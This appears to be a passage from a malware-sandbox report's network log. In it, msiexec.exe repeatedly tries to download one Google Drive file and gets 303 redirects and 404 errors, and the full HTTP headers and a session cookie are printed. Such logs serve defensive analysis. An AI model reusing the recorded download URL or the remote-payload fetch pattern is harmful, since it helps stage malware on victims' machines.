                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.949727142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:30 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:31 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:31 GMT
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-7gmziVAhN04C73TTRS4UVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC6WpkrE1dTEJUYvrf3F0J3AHqplaTy679_MyfYxo0DYzRanxSZBBHU8M16l-NY47OEHfaNdnkxraA
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:31 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 74 7a 58 4c 75 51 31 54 4c 35 49 33 58 6e 61 35 77 39 51 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xtzXLuQ1TL5I3Xna5w9QAA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.949728172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:33 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:34 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:34 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-R6S6-Y38-DvaXLU5IVXljQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.949729142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:36 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:37 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:37 GMT
                                                                            Content-Security-Policy: script-src 'nonce-5DhTH4YSDDw4HdM0PoGYsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC65Cln_I8TLMf4RVCfAT3Ygs_nejFlHeRcnrQGl_d_cP8989dOR8vXOvbrzzYRBG0VeE039mTIwaw
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 5f 46 70 79 65 4f 5a 70 55 6e 50 6c 50 73 77 50 37 68 7a 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P_FpyeOZpUnPlPswP7hzKQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.949730172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:39 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:40 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:40 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy: script-src 'nonce-01YIFNOTPhBmC2FqqTZfEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.949731142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:42 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:43 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:42 GMT
                                                                            Content-Security-Policy: script-src 'nonce-Q2mJrjB3FJ-sa2acuUDKMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC4sgYGX8MDEjxSc-CtiXmNO-kkPq2NyrH84jAO_8C9qkiyyiyQ4dhpO4Wwe3Go5UG3Uu3Yx3RUV0A
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 50 37 68 30 56 77 5f 57 4c 55 4c 35 5a 4a 6d 31 48 71 42 73 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vP7h0Vw_WLUL5ZJm1HqBsA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.949732172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:45 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:46 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:45 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-xHQ-CSLiLTrGw2K361n9Wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.949733142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:47 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:48 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:48 GMT
                                                                            Content-Security-Policy: script-src 'nonce-HhofEG0nNP6P9KUecNOClw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC5WG4ekfceJreGtYog4yN3l62EE0uPVrr_utvRJmE3A4UAjFNZC4DvG1I3QUvMb_a9KC6ZVyZKK_Q
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:48 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 53 4f 56 77 62 37 42 4b 71 54 44 6e 35 4c 46 4e 31 44 31 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fSOVwb7BKqTDn5LFN1D1CQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.949734172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:50 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:51 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
